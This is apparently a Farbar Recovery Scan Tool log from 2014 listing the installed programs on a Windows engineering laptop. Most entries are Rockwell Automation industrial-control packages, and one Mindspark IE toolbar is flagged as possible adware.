Ran by Mark at 2014-11-05 16:34:11
Running from C:\Users\Mark\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
1769-L1Y Controllers and Embedded Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
1769-L2Y Controllers and Embedded Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.0.1) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA0000000001}) (Version: 10.0.1 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Anybus IPconfig (HKLM-x32\...\{D34DCFE0-B94C-4169-AA8A-ED6C6C1EDF46}_is1) (Version: 1.8.1.2 - HMS Industrial Networks)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
Cognex 1756 Comm Module Profiles (x32 Version: 1.16.1.0 - Cognex Corp) Hidden
ControlFLASH (HKLM-x32\...\{ACA55DEA-DF89-47E1-8A80-0EE2248A158D}) (Version: 9.00.015 - Rockwell Software)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - Acro Software Inc.)
CyberLink PowerDVD 9.6 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.6.1.4418 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.127 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DriveTools V5.02.99 (HKLM-x32\...\{CD26B287-C7D5-4783-806B-190528F31480}) (Version: 5.02.99 - Rockwell Automation)
DWG TrueView 2013 (HKLM\...\DWG TrueView 2013) (Version: 19.0.55.0 - Autodesk)
DWG TrueView 2013 (Version: 19.0.55.0 - Autodesk) Hidden
Endress+Hauser EtherNet/IP Comm Module Profiles (x32 Version: 1.18.1.0 - Endress+Hauser, Inc.) Hidden
ENI / ENIW Utility (HKLM-x32\...\{BC90BA1D-F878-4FCF-9020-220744376E81}) (Version:  - )
EPSON Connect version 1.0 (HKLM-x32\...\EPSON Connect_is1) (Version: 1.0 - Epson America Inc.)
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.6.3.0 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{116DBCAF-9544-4592-9156-AC99F6C2D426}) (Version: 3.10.0016 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON XP-610 Series Printer Uninstall (HKLM\...\EPSON XP-610 Series) (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
FactoryTalk Activation Manager 3.50.00 (CPR 9 SR 5) (HKLM-x32\...\{B23DFE1A-5EED-4E71-B800-0F42D803D257}) (Version: 3.50.00.0021 - Rockwell Automation, Inc.)
FactoryTalk Diagnostics 2.50 (CPR 9 SR 5) (HKLM-x32\...\{4852B254-72F7-4098-A9BB-A821669ED85C}) (Version: 2.50.00.0010 - Rockwell Automation, Inc.)
FactoryTalk Gateway 3.50.00 (CPR 9 SR 5) (HKLM-x32\...\{EBEE6A9D-E577-4798-92F7-031C8FE9E478}) (Version: 3.50.00 - Rockwell Automation, Inc.)
FactoryTalk Services Platform 2.50 (CPR 9 SR 5) (HKLM-x32\...\{E2145D1A-0D6B-4160-821F-5EC96DCAFAA4}) (Version: 2.50.00.0010 - Rockwell Automation, Inc.)
FactoryTalk® View Machine Edition 6.10.00 (CPR 9 SR 4) (HKLM-x32\...\{ADE57A5D-6AC7-4F5B-925E-52FC60F77ECF}) (Version: 6.10.00.9 (CPR 9 SR 4) - Rockwell Automation, Inc.)
FreeFileSync v3.18 (HKLM-x32\...\FreeFileSync) (Version:  - )
FromDocToPDF Internet Explorer Toolbar (HKLM-x32\...\FromDocToPDF_65bar Uninstall Internet Explorer) (Version:  - Mindspark Interactive Network) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hardy Instruments 1756 Specialty Module Profiles (x32 Version: 1.07.1.0 - Hardy Instruments, Inc.) Hidden
Hardy Instruments 1769 Specialty Module Profiles (x32 Version: 2.08.1.0 - Hardy Instruments, Inc.) Hidden
HASP Device Drivers (HKLM-x32\...\HASP Device Drivers) (Version:  - )
HyperTerminal Private Edition v7.0 (HKLM-x32\...\HTPE3) (Version:  - )
Ignition (HKLM\...\Ignition 7.7.0) (Version: 7.7.0 - Inductive Automation)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3071 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Java 8 Update 20 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418020F0}) (Version: 8.0.200 - Oracle Corporation)
Jazz-Plugin (HKLM-x32\...\{1C92BD87-DC1B-4C4E-BFB4-2C79E88FA752}) (Version: 1.1.0 - Jazz-Soft)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyspan USB Serial Adapter (HKLM-x32\...\{2E97DE76-851A-48AA-A0D6-665860FAD9CA}) (Version: 3.7.2 - Keyspan)
Logix Designer Motion Database (x32 Version: 21.03.19 - Rockwell Automation, Inc.) Hidden
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mettler-Toledo 1756 Comm Module Profiles (x32 Version: 1.09.1.0 - Mettler-Toledo Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{D8228565-6CD7-40EF-B2EA-C7C95183EDEB}) (Version: 15.8.8308.577 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 Management Objects (HKLM-x32\...\{F5E87B12-3C27-452F-8E78-21D42164FD83}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 (HKLM-x32\...\Microsoft SQL Server 2008 R2) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{2180B33F-3225-423E-BBC1-7798CFD3CD1F}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Setup (English) (HKLM-x32\...\{72DE3C67-FB48-450E-8BEA-4EB1B3B5355D}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM-x32\...\{D441BD04-E548-4F8E-97A4-1B66135BAAA8}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server Browser (HKLM-x32\...\{BF9BF038-FE03-429D-9B26-2FA0FD756052}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 x64 ENU (HKLM\...\{8424B163-D1E0-48B7-88A2-C7A61767B3D7}) (Version: 4.0.8482.1 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{288D79EE-A2D1-42AF-9597-B0ADCC23A8ED}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (HKLM\...\Microsoft Visual J# 2.0 Redistributable Package - SE (x64)) (Version:  - Microsoft Corporation)
Molex Corporation 1756 Comm Module Profiles (x32 Version: 1.25.1.0 - Molex Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{C8B104BE-C895-4976-8295-0B190B53A8B6}) (Version: 3.0.08.18 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (x32 Version: 3.0.08.18 - O2Micro International LTD.) Hidden
Online Development 1756 Comm Module Profiles (x32 Version: 1.02.1.0 - Online Development, Inc.) Hidden
Parker Isysnet Analog Module Profiles (x32 Version: 6.02.2.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet ASCII Module Profile (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet ControlNet Adapter Module Profile (x32 Version: 3.00.0.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles (x32 Version: 6.02.2.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles 2 (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles 3 (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Ethernet Adapter Module Profile (x32 Version: 3.00.0.0 - Parker Hannifin Corporation) Hidden
Phoenix Digital 1756 Communication Module Profiles (x32 Version: 1.05.1.0 - Phoenix Digital, Inc.) Hidden
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
ProSoft Technology 1734 Ethernet Adapter Module Profile (x32 Version: 1.13.1.0 - ProSoft Technology, Inc.) Hidden
ProSoft Technology 1756 MVI Comm Module Profiles (x32 Version: 1.10.1.0 - ProSoft Technology, Inc.) Hidden
Prosoft Technology 1769 Comm Module Profiles (x32 Version: 2.01.1.0 - Prosoft Technology, Inc.) Hidden
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Realtek Audio COM Components (HKLM-x32\...\{2355B503-9B11-4449-861D-1C1748B26320}) (Version: 1.0.2 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5956 - Realtek Semiconductor Corp.)
Redundancy Module Config Tool (HKLM-x32\...\InstallShield_{25010847-562B-45AF-85D0-B40F283F20C5}) (Version: 7.2.7.0 - Rockwell Automation, Inc.)
Redundancy Module Config Tool (x32 Version: 7.2.7.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1440 XM Dynamic Measurement Module Profile (x32 Version: 2.01.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1715 Ethernet Adapter Module Profile (x32 Version: 1.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1715 Redundant I/O Module Profiles (x32 Version: 2.04.3.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1732 Discrete Module Profiles (x32 Version: 2.02.1.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1732 Discrete Module Profiles 2 (x32 Version: 2.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Analog Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Analog Module Profiles 2 (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 ASCII Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 ControlNet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profile, DeviceLogix (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles 2 (x32 Version: 3.00.2579.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles 4 (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Ethernet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Ethernet Adapter,2-Port,Module Profile (x32 Version: 5.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Point Guard Safety Module Profile (x32 Version: 1.01.21.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Specialty Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Analog Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Analog Module Profiles 2 (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 ASCII Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 ControlNet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profile, DeviceLogix (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 2 (x32 Version: 3.00.2579.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 3 (x32 Version: 2.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 4 (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Ethernet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Ethernet Adapter,2-Port,Module Profile (x32 Version: 4.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Specialty Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1747 Module Profiles (x32 Version: 8.00.3000.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 CNet Comms Module Profiles (x32 Version: 1.02.572.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1756 ENet Comms Module Profiles (x32 Version: 1.02.572.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1756 ENet Comms Module Profiles (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 Ethernet Bridge Module Profile (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 HART Module Profiles (x32 Version: 3.06.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 Remote I/O Interface Module Profile (x32 Version: 2.03.3.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Analog Module Profiles (x32 Version: 7.02.8.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Analog Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 ASCII Module Profiles (x32 Version: 2.02.7.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Boolean Module Profiles (x32 Version: 2.02.5.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Controller Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Discrete Module Profiles (x32 Version: 2.02.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Discrete Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Embedded Module Profiles (x32 Version: 2.02.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Specialty Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769-L3Y Controllers Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1783 Ethernet Managed Switch Module Profile (x32 Version: 2.00.2479.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1791DS Discrete Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1799 Embedded Discrete Module Profile (x32 Version: 1.01.6.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2097 Kinetix Module Profiles (x32 Version: 2.01.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 280 ArmorStart Ethernet Module Profiles (x32 Version: 1.03.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2-Port CIP Sync ENetIP Module Profiles (x32 Version: 2.01.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2-Port Quick Connect ENetIP Module Profiles (x32 Version: 1.01.13.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 48MS Vision Sensor Module Profiles (x32 Version: 1.01.19.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 5XRF RFID Reader Module Profiles (x32 Version: 1.02.24.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation ArmorStart LT Module Profiles (x32 Version: 1.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Catalog Services (x32 Version: 2.00.06 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profile (x32 Version: 5.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 2.02.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.01.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.04.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO EtherNet Safety Module Profiles (x32 Version: 5.03.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Download Manager (HKLM-x32\...\{FFAD8DA9-ED41-494d-AC8E-63D861D0A733}) (Version: 2.0.7.35 - NOS Microsystems Ltd.)
Rockwell Automation Driver Package x64 (HKLM-x32\...\{03AE0196-A77D-4DB1-BEA2-2ED79723FB30}) (Version: 1.1.11 - Rockwell Automation.)
Rockwell Automation Drives Peripheral Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 4 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 2 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 3 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 4 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives SCANport Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation E1 Plus Module Profiles (x32 Version: 1.01.0.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation EtherNet/IP Tap Family Module Profiles (x32 Version: 2.06.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Flex Adapter Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Generic Safety Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Kinetix CIP Motion Drive Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Kinetix350 CIP Motion Drive Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation PowerFlex CIP Motion Drive Module Profiles (x32 Version: 13.01.0.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation SLC Adapter Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Stratix 8000/8300 Module Profiles (x32 Version: 5.01.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Software Hardware Maintenance Tool (HKLM-x32\...\RSHWare) (Version:  - )
Rockwell Windows Firewall Configuration Utility 1.00.06 (HKLM-x32\...\{01D8D3AA-2A4F-4085-9CC3-61E389D86D29}) (Version: 1.00.06.0004 - Rockwell Automation, Inc.)
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
RSLinx Classic 2.59.02 CPR 9 SR 5 (HKLM-x32\...\{34540622-805E-4CC7-98CF-65A43E99CF4D}) (Version: 2.59.02 CPR 9 SR 5 - Rockwell Automation, Inc.)
RSLinx Enterprise 5.50.00 (CPR 9 SR 5) (HKLM-x32\...\{777B68AF-27F3-42ED-9B39-B1202E5F71E0}) (Version: 5.50.00 - Rockwell Automation, Inc.)
RSLogix 5 English 7.40.00 (CPR 9) (HKLM-x32\...\{1866FCD2-4DFE-4E79-90B0-E4707DA753D9}) (Version: 7.40.00 - Rockwell Automation, Inc.)
RSLogix 500 English 8.40.00 (CPR 9) (HKLM-x32\...\{436D42D9-1809-40C5-9A82-D2ED2F8EF58C}) (Version: 8.40.00 - Rockwell Automation Inc)
RSLogix 5000 Compare (HKLM-x32\...\{D6088EA7-1828-40AF-A684-3C1AD67FDE68}) (Version: 3.20.00 - Rockwell Software)
RSLogix 5000 Module Profile Core (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core EDS Support (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core System Updates (x32 Version: 6.00.1769.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core System Updates 1 (x32 Version: 8.00.2421.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Setup Utility (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Online Books (HKLM-x32\...\{11000020-B129-11DF-A296-000C296D58C5}) (Version: 20.0.0 - Rockwell Automation, Inc.)
RSLogix 5000 Online Books (HKLM-x32\...\{11010120-B129-11DF-A296-000C296D58C5}) (Version: 20.1.0 - Rockwell Automation, Inc.)
RSLogix 5000 Setup Installer (x32 Version: 5.00.0000 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Start Page Media v20.01.00 (HKLM-x32\...\{10000120-D5FD-11DA-A128-000C29473C90}) (Version: 20.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 System Updates (x32 Version: 20.10.0410 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 v13.04 (HKLM-x32\...\{30010413-EC33-11D6-A408-F6139379CBFB}) (Version: 13.04.0000 - Rockwell Software, Inc.)
RSLogix 5000 v15.02 (HKLM-x32\...\{30010215-EC33-11D6-A408-F6139379CBFB}) (Version: 15.02.0000 - Rockwell Software, Inc.)
RSLogix 5000 v16.04.00 (CPR 9) (HKLM-x32\...\{30010416-EC33-11D6-A408-F6139379CBFB}) (Version: 16.04.00 - Rockwell Automation, Inc.)
RSLogix 5000 v17.01.00 (CPR 9 SR 1) (HKLM-x32\...\{30010117-EC33-11D6-A408-F6139379CBFB}) (Version: 17.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 v18.02.00 (CPR 9 SR 2) (HKLM-x32\...\{30010218-EC33-11D6-A408-F6139379CBFB}) (Version: 18.02.00 - Rockwell Automation, Inc.)
RSLogix 5000 v19.01.00 (CPR 9 SR 3) (HKLM-x32\...\{30010119-EC33-11D6-A408-F6139379CBFB}) (Version: 19.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 v20.01.00 (CPR 9 SR 5) (HKLM-x32\...\{31000120-EC33-11D6-A408-F6139379CBFB}) (Version: 20.01.00 - Rockwell Automation, Inc.)
RSLogix Emulate 5000 20.01.00 (CPR 9 SR 5) (HKLM-x32\...\{BCD7C18D-1DE9-4978-AFC3-719C97D8324A}) (Version: 20.01.00 - Rockwell Automation, Inc.)
RSNetWorx for ControlNet 11.00.00 (CPR 9 SR 5) (HKLM-x32\...\{2BF0655E-B036-43F6-9230-BB45CB07F004}) (Version: 11.00.00 - Rockwell Automation, Inc.)
